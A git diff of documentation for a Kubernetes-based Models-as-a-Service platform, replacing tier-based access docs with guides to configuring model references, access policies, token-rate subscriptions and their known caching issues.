-- Verify RBAC resources were created: `kubectl get roles,rolebindings -n <model-namespace>`
+- Verify your subscription (MaaSAuthPolicy, MaaSSubscription) grants access to the model
+- Check that your API key or token is valid and has the correct permissions
+- Ensure the model's MaaSModelRef and AuthPolicy are correctly configured
 
 ### 403 Forbidden When Accessing Model
 
-- Ensure the tier annotation includes your tier
-- Check that RBAC was properly created for your tier
-- Verify the service account in your token has the correct tier namespace
-
-!!!Warning "Removing Models from Tiers During Active Usage"
-    When updating the `alpha.maas.opendatahub.io/tiers` annotation to remove a tier, be aware that active requests may be affected. See [Model Tier Access Behavior](./model-access-behavior.md#model-tier-access-changes-during-active-usage) for details on expected behaviors and recommended practices.
+- Ensure your subscription includes access to the model
+- Verify MaaSAuthPolicy grants your group access
+- Check that the maas-controller has reconciled the AuthPolicy
 
 ## References
 
-- [Tier Management](./tier-overview.md) - Learn about configuring tier access
-- [Tier Configuration](./tier-configuration.md) - Detailed tier setup instructions
-- [Model Tier Access Behavior](./model-access-behavior.md) - Expected behaviors and operational considerations
+- [Access and Quota Overview](subscription-overview.md) - Configure policies and subscriptions
+- [Quota and Access Configuration](quota-and-access-configuration.md) - Detailed configuration
+- [Model Access Behavior](model-access-behavior.md) - Expected behaviors when modifying model access
 - [Architecture Overview](../architecture.md) - Understand the overall MaaS architecture
 - [KServe LLMInferenceService Documentation](https://kserve.github.io/website/) - Official KServe documentation
diff --git a/docs/content/configuration-and-management/quota-and-access-configuration.md b/docs/content/configuration-and-management/quota-and-access-configuration.md
new file mode 100644
index 000000000..62c9d1826
--- /dev/null
+++ b/docs/content/configuration-and-management/quota-and-access-configuration.md
@@ -0,0 +1,263 @@
+# Quota and Access Configuration
+
+This guide provides step-by-step instructions for configuring MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription. For conceptual overview, see [Access and Quota Overview](subscription-overview.md) and [MaaS Models](maas-models.md).
+
+## Prerequisites
+
+- **MaaS platform installed** — See [Install MaaS Components](../install/maas-setup.md)
+- **LLMInferenceService** for your model (or external model endpoints)
+- Cluster admin or equivalent permissions to create CRs in the `models-as-a-service` and model namespaces
+
+!!! note "Deploy a sample model"
+    Command to deploy simulator model as `free-model`:
+
+    ```bash
+    kustomize build 'https://github.com/opendatahub-io/models-as-a-service//docs/samples/maas-system/free/llm?ref=main' | \
+      sed 's/facebook-opt-125m-simulated/free-model/g' | kubectl apply -f -
+    ```
+
+## Overview: What You'll Accomplish
+
+Before running the configuration steps, here is the flow you will set up:
+
+1. **Register models** — Create a MaaSModelRef for each model so MaaS knows about it and can expose it through the API. The controller reconciles each ref and populates the endpoint.
+
+2. **Grant access** — Create MaaSAuthPolicy resources that define *which* groups or users can use *which* models. A user must match a policy to see and call a model.
+
+3. **Define subscriptions** — Create MaaSSubscription resources that define *quota* (token rate limits) for groups or users. A user must have both access (policy) and quota (subscription) to use a model.
+
+4. **Validate** — Confirm the CRs are reconciled, policies are enforced, and you can list models and run inference.
+
+## Configuration Steps
+
+Set the namespace and name of your LLMInferenceService (used in the commands below):
+
+```bash
+MODEL_NS=llm
+MODEL_NAME=free-model  # From the Prerequisites deploy; or: kubectl get llminferenceservice -n $MODEL_NS -o jsonpath='{.items[0].metadata.name}'
+```
+
+### 1. Register Models (MaaSModelRef)
+
+Create a MaaSModelRef for each model you want to expose through MaaS. The MaaSModelRef must be in the **same namespace** as the LLMInferenceService. The `spec.modelRef.name` must match the LLMInferenceService name.
+
+```yaml
+kubectl apply -f - <<EOF
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: ${MODEL_NAME}-ref
+  namespace: ${MODEL_NS}
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: ${MODEL_NAME}
+EOF
+```
+
+Verify the controller has reconciled and set the endpoint:
+
+```bash
+kubectl get maasmodelref -n ${MODEL_NS}
+# Check status.endpoint and status.phase
+```
+
+### 2. Grant Access (MaaSAuthPolicy)
+
+Create an MaaSAuthPolicy to define which groups/users can access which models:
+
+```yaml
+kubectl apply -f - <<EOF
+# MaaSAuthPolicy must be deployed to the models-as-a-service namespace
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSAuthPolicy
+metadata:
+  name: free-access
+  namespace: models-as-a-service
+spec:
+  modelRefs:
+    - name: ${MODEL_NAME}-ref
+      namespace: ${MODEL_NS}
+  subjects:
+    groups:
+      - name: free-users
+    users: []
+EOF
+```
+
+Verify the MaaSAuthPolicy is active (AuthPolicy created and enforced):
+
+```bash
+# List generated AuthPolicy (may take a moment for controller to reconcile)
+kubectl get authpolicy -n ${MODEL_NS} -l maas.opendatahub.io/model=${MODEL_NAME}-ref
+
+# Wait for AuthPolicy to be enforced (re-run if the controller has not reconciled yet)
+AUTH_POLICY=$(kubectl get authpolicy -n ${MODEL_NS} -l maas.opendatahub.io/model=${MODEL_NAME}-ref -o jsonpath='{.items[0].metadata.name}')
+[[ -n "$AUTH_POLICY" ]] && kubectl wait --for=condition=Enforced=true authpolicy/${AUTH_POLICY} -n ${MODEL_NS} --timeout=120s
+```
+
+**Multiple policies per model**: You can create multiple MaaSAuthPolicies that reference the same model. The controller aggregates them — a user matching any policy gets access.
+
+### 3. Define Subscriptions (MaaSSubscription)
+
+Create a MaaSSubscription to define per-model token rate limits for owner groups:
+
+```yaml
+kubectl apply -f - <<EOF
+# MaaSSubscription must be deployed to the models-as-a-service namespace
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: free-subscription
+  namespace: models-as-a-service
+spec:
+  owner:
+    groups:
+      - name: free-users
+    users: []
+  modelRefs:
+    - name: ${MODEL_NAME}-ref
+      namespace: ${MODEL_NS}
+      tokenRateLimits:
+        - limit: 100
+          window: 1m
+  priority: 10
+EOF
+```
+
+Verify the MaaSSubscription is active (TokenRateLimitPolicy created and enforced):
+
+```bash
+# List generated TokenRateLimitPolicy (may take a moment for controller to reconcile)
+kubectl get tokenratelimitpolicy -n ${MODEL_NS} -l maas.opendatahub.io/model=${MODEL_NAME}-ref
+
+# Wait for TokenRateLimitPolicy to be enforced (re-run if the controller has not reconciled yet)
+TRLP=$(kubectl get tokenratelimitpolicy -n ${MODEL_NS} -l maas.opendatahub.io/model=${MODEL_NAME}-ref -o jsonpath='{.items[0].metadata.name}')
+[[ -n "$TRLP" ]] && kubectl wait --for=condition=Enforced=true tokenratelimitpolicy/${TRLP} -n ${MODEL_NS} --timeout=120s
+```
+
+!!! note "Namespace requirements"
+    Both **MaaSAuthPolicy** and **MaaSSubscription** must be installed in the `models-as-a-service` namespace. Each `modelRefs` entry must specify the `namespace` where the MaaSModelRef lives (e.g. `llm`).
+
+!!! warning "Using the `users` field"
+    The `subjects.users` (MaaSAuthPolicy) and `owner.users` (MaaSSubscription) fields should be used only for **Service Accounts** and similar programmatic identities, not for many individual human users. Having too many distinct users can cause [cardinality issues](../advanced-administration/subscription-cardinality.md) in rate limiting and policy enforcement. Prefer `groups` for human users.
+
+**Premium example** with higher limits:
+
+```yaml
+kubectl apply -f - <<EOF
+# MaaSSubscription must be deployed to the models-as-a-service namespace
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: premium-subscription
+  namespace: models-as-a-service
+spec:
+  owner:
+    groups:
+      - name: premium-users
+    users: []
+  modelRefs:
+    - name: ${MODEL_NAME}-ref
+      namespace: ${MODEL_NS}
+      tokenRateLimits:
+        - limit: 100000
+          window: 24h
+  priority: 20
+  tokenMetadata:
+    organizationId: "premium-org"
+    costCenter: "ai-team"
+EOF
+```
+
+### 4. Validate the Configuration
+
+**Check CRs and generated policies:**
+
+```bash
+kubectl get maasmodelref -n ${MODEL_NS}
+kubectl get maasauthpolicy,maassubscription -n models-as-a-service
+kubectl get authpolicy,tokenratelimitpolicy -n ${MODEL_NS}
+```
+
+**Create groups and add users** (OpenShift example):
+
+```bash
+# Create groups if they do not exist
+oc adm groups new free-users 2>/dev/null || true
+oc adm groups new premium-users 2>/dev/null || true
+
+# Add users to each group
+oc adm groups add-users free-users alice@example.com
+oc adm groups add-users premium-users bob@example.com
+```
+
+**Create API keys and verify access:**
+
+Create an API key as a user in `free-users` and another as a user in `premium-users`. Follow the [Validation](../install/validation.md) guide to:
+
+1. Get the gateway endpoint and create an API key for each user
+2. List models and run inference with each API key
+3. Test with both groups to confirm access and different rate limits — free-users (100 tokens/min) vs premium-users (100,000 tokens/24h)
+
+## Adding Groups
+
+To grant a user access to a subscription, add them to the appropriate Kubernetes group:
+
+```bash
+# Create groups if they do not exist
+oc adm groups new free-users 2>/dev/null || true
+oc adm groups new premium-users 2>/dev/null || true
+
+# Add users (method depends on your IdP; OpenShift example)
+oc adm groups add-users free-users alice@example.com
+oc adm groups add-users premium-users bob@example.com
+```
+
+Users will get subscription access on their next request (after group membership propagates).
+
+## Multiple Subscriptions per User
+
+When a user belongs to multiple groups that each have a subscription, the access depends on the API key used. A subscription is bound to each API key at minting (explicit or highest priority). See [Understanding Token Management](token-management.md).
+
+## Troubleshooting
+
+### 403 Forbidden: "no access to subscription"
+
+**Cause:** User requested a subscription they do not belong to (group membership).
+
+**Fix:** Ensure the user is in a group listed in the subscription's `spec.owner.groups`.
+
+### 429 Too Many Requests
+
+**Cause:** User exceeded token rate limit for the model.
+
+**Fix:** Wait for the rate limit window to reset, or upgrade to a subscription with higher limits.
+
+### Model not appearing in GET /v1/models
+
+**Cause:** MaaSModelRef missing, not reconciled, or access probe failed.
+
+**Fix:**
+
+- Verify MaaSModelRef exists in the model namespace (e.g. `llm`) and has `status.phase: Ready`
+- Check MaaSAuthPolicy in `models-as-a-service` includes the user's groups and references the MaaSModelRef with correct `name` (e.g. `${MODEL_NAME}-ref`) and `namespace`
+- Ensure MaaSSubscription in `models-as-a-service` exists for the model and user's groups
+
+### Policies not enforced
+
+**Cause:** Kuadrant controller may need to re-sync.
+
+**Fix:**
+
+```bash
+kubectl delete pod -l control-plane=controller-manager -n kuadrant-system
+kubectl wait --for=condition=Enforced=true tokenratelimitpolicy/<policy-name> -n llm --timeout=2m
+```
+
+## Related Documentation
+
+- [Access and Quota Overview](subscription-overview.md) — How policies and subscriptions work together
+- [MaaS Models](maas-models.md) — Conceptual overview
+- [Token Management](token-management.md)
+- [Validation](../install/validation.md)
diff --git a/docs/content/configuration-and-management/subscription-known-issues.md b/docs/content/configuration-and-management/subscription-known-issues.md
new file mode 100644
index 000000000..8f55af505
--- /dev/null
+++ b/docs/content/configuration-and-management/subscription-known-issues.md
@@ -0,0 +1,47 @@
+# Subscription Known Issues
+
+This document describes known issues and operational considerations for the subscription-based MaaS Platform.
+
+## Subscription Selection Caching
+
+### Cache TTL for Subscription Selection
+
+**Impact:** Medium
+
+**Description:**
+
+Authorino caches the result of the MaaS API subscription selection call (e.g., 60 second TTL). If a user's group membership changes:
+
+- Within the cache window, the old subscription selection may still apply
+- After cache expiry, the new group membership is used
+- Restarting Authorino pods forces immediate cache invalidation (disruptive)
+
+**Workaround:**
+
+- Wait for cache TTL for changes to fully propagate
+- For immediate effect, restart Authorino pods (disruptive; use during maintenance windows)
+
+## API Key vs OpenShift Token
+
+### Group Snapshot in API Keys
+
+**Impact:** Medium
+
+**Description:**
+
+API keys store the user's groups and bound subscription name at creation time. If a user's group membership changes after the key was created:
+
+- The key still carries the **old** groups and subscription until it is revoked and recreated
+- Subscription metadata for gateway inference uses the stored groups and subscription from validation
+- The user must create a new API key to pick up new groups or a different default subscription
+
+**Workaround:**
+
+- Revoke and recreate API keys when users change groups
+- Use OpenShift tokens for interactive use when group membership changes frequently (tokens reflect live group membership)
+
+## Related Documentation
+
+- [Understanding Token Management](token-management.md)
+- [Access and Quota Overview](subscription-overview.md)
+- [Quota and Access Configuration](quota-and-access-configuration.md)
diff --git a/docs/content/configuration-and-management/subscription-overview.md b/docs/content/configuration-and-management/subscription-overview.md
new file mode 100644
index 000000000..e8cad48b4
--- /dev/null
+++ b/docs/content/configuration-and-management/subscription-overview.md
@@ -0,0 +1,69 @@
+# Access and Quota Overview
+
+When planning authorization for Models as a Service, it is important to understand how **policies** (MaaSAuthPolicy) and **subscriptions** (MaaSSubscription) work together. Both use RBAC references (subjects or owners). A user must have **both** a matching policy (access) and a matching subscription (quota) to use a model.
+
+MaaSAuthPolicy and MaaSSubscription are namespace-scoped to `models-as-a-service`; they reference MaaSModelRefs (in e.g. `llm`) by `name` and `namespace` in their `modelRefs`.
+
+```mermaid
+flowchart TD
+    User([User / App]) -- "Request (API key + model)" --> Gateway{MaaS API Gateway}
+
+    subgraph Validation ["Dual-Check Gate"]
+        direction LR
+        A["MaaSAuthPolicy<br/>(Access: Can I use this?)"]
+        B["MaaSSubscription<br/>(Quota: Is there quota?)"]
+    end
+
+    Gateway --> A
+    Gateway --> B
+
+    A -- "Pass" --> BothPass
+    B -- "Pass" --> BothPass
+
+    BothPass{Access Granted} --> InferenceService["Inference Service"]
+
+    style User fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
+    style Gateway fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff
+    style A fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style B fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style BothPass fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+    style InferenceService fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+```
+
+## Policies vs. Subscriptions
+
+| Concern | CRD | Purpose | Subjects/Owners |
+|---------|-----|---------|-----------------|
+| **Access** | MaaSAuthPolicy | Grants permission to use specific models | `subjects` (groups/users) |
+| **Quota** | MaaSSubscription | Defines token rate limits for model usage | `owner` (groups/users) |
+| **Model** | MaaSModelRef | Identifies models on the cluster; provides endpoint and status | — |
+
+
+## Why Separate Policies and Subscriptions?
+
+This separation lets you create **generic subscriptions** that span many models while still limiting access to specific models per team.
+
+**Example:** You have a Premium subscription that spans 20 models. You want to give the `data-science-team` access to 5 of those models at the Premium subscription level.
+
+**How to do it:**
+
+1. Make `data-science-team` the **owner** of the Premium subscription (they get quota for all 20 models).
+2. Create a **policy** that grants `data-science-team` access to only those 5 models.
+
+The team can use only the 5 models specified in the policy. Their usage is governed by the subscription's rate limits.
+
+**Benefits:**
+
+- **Add or remove access per team** — Update the policy to grant or revoke access to models for that team; no changes to the subscription required.
+- **Reuse one subscription across teams** — Another team (e.g., `ml-engineering`) can be an owner of the same Premium subscription but have a policy that grants access to a different subset of models (e.g., 8 of the 20). Each team gets the same quota tier but only sees the models you allow.
+
+## Related Documentation
+
+For configuration details, see:
+
+- [Quota and Access Configuration](quota-and-access-configuration.md) — Step-by-step configuration for MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription
+
+Additional references:
+
+- [Subscription Architecture](https://github.com/opendatahub-io/models-as-a-service/blob/main/archdiagrams/SubscriptionArch.md) — Design document for the subscription model
+- [MaaS Controller old-vs-new flow](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/docs/old-vs-new-flow.md) — Comparison of subscription-based flows
diff --git a/docs/content/configuration-and-management/tier-concepts.md b/docs/content/configuration-and-management/tier-concepts.md
deleted file mode 100644
index 68c6205f2..000000000
--- a/docs/content/configuration-and-management/tier-concepts.md
+++ /dev/null
@@ -1,80 +0,0 @@
-# Tier Concepts
-
-This section provides reference information about how the tier system works.
-
-## Tier Membership Mapping
-
-MaaS and Kubernetes administrators can defined the subscription levels using the `tier-to-group-mapping` ConfigMap in the `maas-api` namespace:
-
-**tier-to-group-mapping.yaml ConfigMap example:**
-
-```yaml
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: tier-to-group-mapping
-  namespace: maas-api
-data:
-  tiers: |
-    - name: free
-      description: Free tier for basic users
-      level: 1
-      groups:
-      - system:authenticated
-    - name: premium
-      description: Premium tier
-      level: 10
-      groups:
-      - premium-users
-    - name: enterprise
-      description: Enterprise tier
-      level: 20
-      groups:
-      - enterprise-users
-```
-
-## ConfigMap Field Breakdown
-
-| Field | Purpose | Default Value |
-|-------|---------|----------|
-| **name** | The tier identifier used throughout the system. Must be unique and matches tier names in rate limit policies. | `free`, `premium`, `enterprise` |
-| **description** | Human-readable description of the tier's purpose and who it's intended for. Used for documentation and UI display. | `Free tier for basic users`, `Enterprise tier for high-volume customers` |
-| **level** | Numeric hierarchy for tier precedence. Higher numbers indicate higher tiers. <br> When a user belongs to multiple groups, the highest level tier is selected. | `1` (lowest), `10` (medium), `20` (highest) |
-| **groups** | Kubernetes groups whose members are assigned to this tier. <br> Users must be members of at least one group in the list to get this tier. | `system:authenticated`, `premium-users`, `enterprise-users` |
-
-**Important Notes:**
-
-- Users with **multiple group memberships** are assigned to the tier with the **highest level number**
-- The `system:authenticated` group includes all authenticated users, commonly used for the free tier
-- Group names must exist in your Kubernetes identity provider (LDAP, OIDC, etc.)
-- Tier `name` values are case-sensitive and must match exactly with rate limit policy predicates
-
-## Tier Rate Limits Configuration
-
-MaaS and Kubernetes administrators can configure rate limits for each tier using the `RateLimitPolicy` custom resource.
-
-**RateLimitPolicy.yaml example:**
-
-```yaml
-apiVersion: kuadrant.io/v1beta2
-kind: RateLimitPolicy
-metadata:
-  name: model-rate-limits
-  namespace: llm
-```
-
-## Tier Namespaces
-
-Each tier gets a dedicated namespace following the pattern `<instance-name>-tier-<tier-name>`:
-
-- `maas-default-gateway-tier-free`
-- `maas-default-gateway-tier-premium`
-- `maas-default-gateway-tier-enterprise`
-
-## Tier Resolution Process
-
-1. User authenticates with JWT token
-2. Gateway extracts user groups from token
-3. MaaS API resolves tier based on group membership
-4. Tier information is cached for 5 minutes
-5. Access control and rate limiting are applied based on tier
diff --git a/docs/content/configuration-and-management/tier-configuration.md b/docs/content/configuration-and-management/tier-configuration.md
deleted file mode 100644
index bcd15385e..000000000
--- a/docs/content/configuration-and-management/tier-configuration.md
+++ /dev/null
@@ -1,263 +0,0 @@
-# Tier Configuration
-
-This guide provides step-by-step instructions for configuring and managing tiers in the MaaS Platform.
-
-## Configuration Steps
-
-### 1. Configure Tier Mapping
-
-Update `tier-to-group-mapping` ConfigMap:
-
-To add a new tier, save the current ConfigMap, modify it, and reapply:
-
-```bash
-# 1. Edit ConfigMap (use example below as a guide)
-kubectl edit configmap tier-to-group-mapping -n maas-api
-
-# Example: Add this tier entry to the end of the tiers list:
-#   - name: stier
-#     description: S tier user
-#     level: 99
-#     groups:
-#     - fox
-```
-
-Verify the updated ConfigMap:
-
-```bash
-kubectl apply -f - <<EOF
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: tier-to-group-mapping
-  namespace: maas-api
-data:
-  tiers: |
-    - name: free
-      description: Free tier for basic users
-      level: 1
-      groups:
-      - system:authenticated
-    - name: premium
-      description: Premium tier
-      level: 10
-      groups:
-      - premium-users
-    - name: enterprise
-      description: Enterprise tier
-      level: 20
-      groups:
-      - enterprise-users
-EOF
-```
-
-Restart the MaaS API to pick up the new configuration:
-
-```bash
-kubectl rollout restart deployment/maas-api -n maas-api
-```
-
-!!!Note "Adding Users to Tiers"
-    To add a user to a tier, add them to the appropriate Kubernetes group. For example, to add a user to the `fox` group (which maps to the `stier` tier in this example):
-
-    ```bash
-    # Add a user to the fox group
-    kubectl patch group fox -p '{"users": ["username"]}' --type merge
-    ```
-
-    Replace `username` with the actual username. Users will automatically be assigned to the tier when they request a new token.
-
-### 2. Configure Tier Access
-
-Grant tier-specific access to models by annotating the `LLMInferenceService` resource with the `alpha.maas.opendatahub.io/tiers` annotation:
-
-```bash
-kubectl annotate llminferenceservice <model-name> -n llm \
-  alpha.maas.opendatahub.io/tiers='["stier","premium","enterprise"]' \
-  --overwrite
-```
-
-**Annotation Behavior:**
-
-- **List of tier names**: Grant access to specific tiers (e.g., `["stier","premium","enterprise"]`)
-- **Empty list `[]`**: Grant access to **all** tiers
-- **Missing annotation**: **No** tiers have access by default
-
-**Example - Grant access to stier and premium tiers:**
-
-```bash
-kubectl annotate llminferenceservice qwen3 -n llm \
-  alpha.maas.opendatahub.io/tiers='["stier","premium"]' \
-  --overwrite
-```
-
-This annotation automatically sets up the necessary RBAC (Role and RoleBinding) for the specified tiers to access the model via MaaS tokens.
-
-!!!Note "Manual RBAC Setup"
-    For reference, here's what the automatic RBAC setup looks like behind the scenes if you need to configure access manually:
-
-    ```yaml
-    ---
-    apiVersion: rbac.authorization.k8s.io/v1
-    kind: Role
-    metadata:
-      name: model-post-access
-      namespace: <model-namespace>
-    rules:
-      - apiGroups: ["serving.kserve.io"]
-        resources: ["llminferenceservices"]
-        verbs: ["post"]
-    ---
-    apiVersion: rbac.authorization.k8s.io/v1
-    kind: RoleBinding
-    metadata:
-      name: model-post-access-tier-binding
-      namespace: <model-namespace>
-    subjects:
-      - kind: Group
-        name: system:serviceaccounts:maas-default-gateway-tier-<tier>
-        apiGroup: rbac.authorization.k8s.io
-    roleRef:
-      kind: Role
-      name: model-post-access
-      apiGroup: rbac.authorization.k8s.io
-    ```
-
-!!!info "Why the custom `post` verb?"
-    We intentionally use a custom verb (`post`) instead of standard Kubernetes verbs like `get` or `create`. This is the **only** RBAC permission required for model access. By using a non-standard verb that doesn't exist in Kubernetes' built-in authorization, we minimize the security surface - these service accounts cannot accidentally read, modify, or delete any cluster resources.
-
-### 3. Configure Rate Limiting
-
-Add tier-specific rate limits by patching the TokenRateLimitPolicy targeting the gateway:
-
-```bash
-kubectl patch tokenratelimitpolicy <policy-name> -n openshift-ingress --type merge --patch-file=/dev/stdin <<'EOF'
-spec:
-  limits:
-    stier-user-tokens: # 1
-      rates:
-        - limit: 999 # 2
-          window: 1m # 3
-      when:
-        - predicate: auth.identity.tier == "stier" # 4
-      counters:
-        - expression: auth.identity.userid # 5
-EOF
-```
-
-**Rate Limit Policy Configuration Explained:**
-
-1. **Tier definition** - Each tier (free, premium, enterprise) gets its own configuration block (this is just a naming convention, it is not used for the actual tier resolution)
-2. **Token limit** - Maximum number of total tokens allowed per time window
-3. **Time window** - Duration after which the request counter resets
-4. **Predicate condition** - Determines when this tier's limits apply based on user authentication
-5. **Counter expression** - Tracks token consumption per user ID (globally)
-
-!!!Warning "Important"
-    The predicate condition (not the Tier Definition) is used to determine when this tier's limits apply based on user authentication. It is a CEL expression that is evaluated by the Authorino policy engine.
-
-Validate the TokenRateLimitPolicy has been updated and enforced:
-
-```bash
-# Delete the Kuadrant operator pod to trigger a re-sync
-kubectl delete pod -l control-plane=controller-manager -n kuadrant-system
-
-# Wait for the TokenRateLimitPolicy to be enforced
-kubectl wait --for=condition=Enforced=true tokenratelimitpolicy/<policy-name> -n openshift-ingress --timeout=2m
-```
-
-### 4. Validate the Configuration
-
-Configuration can be validated by logging in as a user belonging to the appropriate group and running through the manual validation steps in the [deployment scripts documentation](../install/validation.md), or by using the automated validation script.
-
-```bash
-# Validate the configuration with 20 requests and a max tokens limit of 500
-./scripts/validate-deployment.sh --rate-limit-requests 20 --max-tokens 500
-```
-
-**Example Output:**
-
-```bash
-🔍 Checking: Token information
-ℹ️  Token subject: system:serviceaccount:maas-default-gateway-tier-stier:jland-78028f6d
-✅ PASS: User tier: stier <--- Important
-🔍 Checking: Models endpoint
-✅ PASS: Models endpoint returns 200 OK
-...
-🔍 Checking: Rate limiting
-ℹ️  Sending 20 rapid requests to test rate limiting...
-✅ PASS: Rate limiting is working (5 successful, 15 rate limited) <--- Important
-```
-
-## Troubleshooting
-
-### General Tips
-
-**Authentication errors (403/401):**
-Check Authorino logs for detailed error messages:
-
-```bash
-kubectl logs -n openshift-ingress -l app.kubernetes.io/name=authorino --tail=50
-```
-
-**Token retrieval issues:**
-Check MaaS API logs during the token request:
-
-```bash
-kubectl logs -n maas-api -l app=maas-api --tail=50
-```
-
-**Policy enforcement issues:**
-Restart the Kuadrant operator to trigger policy re-sync:
-
-```bash
-kubectl delete pod -l control-plane=controller-manager -n kuadrant-system
-```
-
-### Common Issues
-
-#### 403 Forbidden: "not authorized: unknown reason"
-
-**Possible Cause:** Added new tier to ConfigMap but didn't update the TokenRateLimitPolicy.
-
-**Fix:** Validate/Update the TokenRateLimitPolicy as documented in [Configure Rate Limiting](#3-configure-rate-limiting), then restart the Kuadrant operator:
-
-```bash
-kubectl patch tokenratelimitpolicy <policy-name> -n openshift-ingress --type merge --patch-file=/dev/stdin <<'EOF'
-spec:
-  limits:
-    <tier-name>-user-tokens:
-      rates:
-        - limit: 999
-          window: 1m
-      when:
-        - predicate: auth.identity.tier == "<tier-name>"
-      counters:
-        - expression: auth.identity.userid
-EOF
-
-kubectl delete pod -l control-plane=controller-manager -n kuadrant-system
-```
-
-!!!Warning "Modifying Tiers During Active Usage"
-    Modifying the tier definitions (ConfigMap) while users have active requests may cause side effects due to caching and eventual consistency. See [Tier Modification Known Issues](./tier-modification-known-issues.md) for details on:
-
-    - Propagation delays for group changes
-    - Tier name immutability
-    - Monitoring inconsistencies
-    - Service interruptions on tier deletion
-
-!!!Warning "Removing Group Membership During Active Usage"
-    Removing a user from a group while they have active tokens may not immediately revoke access. See [Group Membership Known Issues](./group-membership-known-issues.md) for details on:
-
-    - Existing tokens remaining valid until expiration
-    - Rate limiting continuing at the old tier
-    - Service Account persistence after group removal
-    - Recommended practices for group membership changes
-
-!!!info "Model Tier Access Changes"
-    Removing a model from a tier's access list (by updating the `alpha.maas.opendatahub.io/tiers` annotation) takes effect immediately. See [Model Tier Access Behavior](./model-access-behavior.md#model-tier-access-changes-during-active-usage) for details on:
-
-    - Expected behaviors when access is revoked
-    - RBAC propagation timing
-    - Recommended practices for tier access changes
diff --git a/docs/content/configuration-and-management/tier-modification-known-issues.md b/docs/content/configuration-and-management/tier-modification-known-issues.md
deleted file mode 100644
index 724321618..000000000
--- a/docs/content/configuration-and-management/tier-modification-known-issues.md
+++ /dev/null
@@ -1,115 +0,0 @@
-# Tier Modification Known Issues
-
-This document describes known issues and side effects related to modifying tier definitions (ConfigMap) during active usage in the MaaS Platform Technical Preview release.
-
-## Tier Configuration Changes During Active Usage
-
-### Issue Description
-
-When the `tier-to-group-mapping` ConfigMap is modified (e.g., changing groups or levels) while users are actively making requests, several side effects may occur due to caching and eventual consistency in the system.
-
-### How Tier Resolution Works
-
-1. **ConfigMap**: Tiers are defined in the `tier-to-group-mapping` ConfigMap.
-2. **MaaS API**: Watches the ConfigMap and updates its internal state. Used for token generation.
-3. **AuthPolicy (Authorino)**: Caches tier lookup results for authenticated users (default TTL: 5 minutes).
-4. **Token**: Contains a Service Account identity associated with a specific tier namespace (e.g., `maas-default-gateway-tier-free`) at the time of issuance.
-
-### Side Effects
-
-#### 1. Propagation Delay for Group Changes
-
-**Impact**: Medium
-
-**Description**:
-
-If a user's group membership changes or a tier's group definition is updated:
-
-- The `AuthPolicy` (Authorino) caches the user's tier for 5 minutes.
-- The user will continue to be rate-limited according to their *old* tier until the cache expires.
-- After the cache expires, the new tier limits will apply.
-
-**Example Scenario**:
-
-```text
-T+0s:  User added to "premium-users" group (was "free")
-T+10s: ConfigMap updated in MaaS API
-T+1m:  User makes request -> Authorino uses cached "free" tier (Rate Limit: 10/min)
-T+5m:  Cache expires
-T+6m:  User makes request -> Authorino looks up tier -> "premium" (Rate Limit: 1000/min)
-```
-
-**Workaround**:
-
-- Wait for the cache TTL (5 minutes) for changes to fully propagate.
-- Restart the Authorino pods to force immediate cache invalidation (disruptive).
-
-#### 2. Tier Names Are Immutable
-
-**Important**: Tier names (the `name` field in the ConfigMap) are expected to be **immutable** and should not be renamed after creation. This design ensures consistency across:
-
-- `RateLimitPolicy` and `TokenRateLimitPolicy` definitions
-- Tier namespace naming (e.g., `maas-default-gateway-tier-free`)
-- Token claims and Service Account associations
-
-**If you need to change how a tier is displayed to users**, use the `displayName` field instead. The `displayName` can be modified at any time without affecting the underlying tier configuration or policies.
-
-**Example**:
-
-```yaml
-# Correct: Change displayName, not name
-tiers:
-  - name: free           # Immutable - do not change
-    displayName: "Starter Plan"  # Can be changed for UI purposes
-    level: 1
-    groups:
-      - "system:authenticated"
-```
-
-#### 3. Monitoring Inconsistency
-
-**Impact**: Low
-
-**Description**:
-
-Tokens are issued with a Service Account in a tier-specific namespace (e.g., `maas-default-gateway-tier-free`). This namespace is embedded in the token claims.
-If a user moves to a new tier (e.g., `premium`) but continues using a valid token issued under the old tier:
-
-- **Enforcement**: They get the *new* tier's rate limits (after cache expiry).
-- **Monitoring**: Their usage metrics in Prometheus will still be attributed to the *old* Service Account/Namespace (`maas-default-gateway-tier-free`).
-
-**Example**:
-
-- User upgrades to Premium.
-- Token claim: `system:serviceaccount:maas-default-gateway-tier-free:user-123`
-- Rate Limit enforced: Premium (correct)
-- Prometheus Metric: `requests_total{namespace="maas-default-gateway-tier-free"}` (incorrect attribution)
-
-**Workaround**:
-
-- Users must request a new token to have their usage correctly attributed to the new tier's namespace.
-- This is a monitoring reporting issue only; access control is unaffected.
-- **Token Invalidation**: Tokens can be invalidated by removing the old ServiceAccount associated with them. When a user moves to a new tier, their old ServiceAccount in the previous tier namespace remains (it is not automatically deleted). Administrators can manually delete these orphaned ServiceAccounts to invalidate any remaining tokens, but this is not required for normal operation.
-
-#### 4. Service Interruption on Tier Deletion
-
-**Impact**: Medium
-
-**Description**:
-
-If a tier is deleted from the ConfigMap while users are still assigned to it (and have no other matching tier):
-
-- The `TierLookup` endpoint will return an error (e.g., 404 or GroupNotFound).
-- The `AuthPolicy` relies on this metadata.
-- Requests may fail with `403 Forbidden` or `500 Internal Server Error` depending on how the failure is handled in the policy.
-
-**Workaround**:
-
-- Ensure users are moved to a new tier (via group changes) *before* deleting the old tier definition.
-
-### Recommended Practices
-
-1. **Treat Tier Names as Immutable**: Do not rename tiers after creation. Use `displayName` for UI-facing name changes.
-2. **Update Policies First**: When adding new tiers, update the `RateLimitPolicy` first.
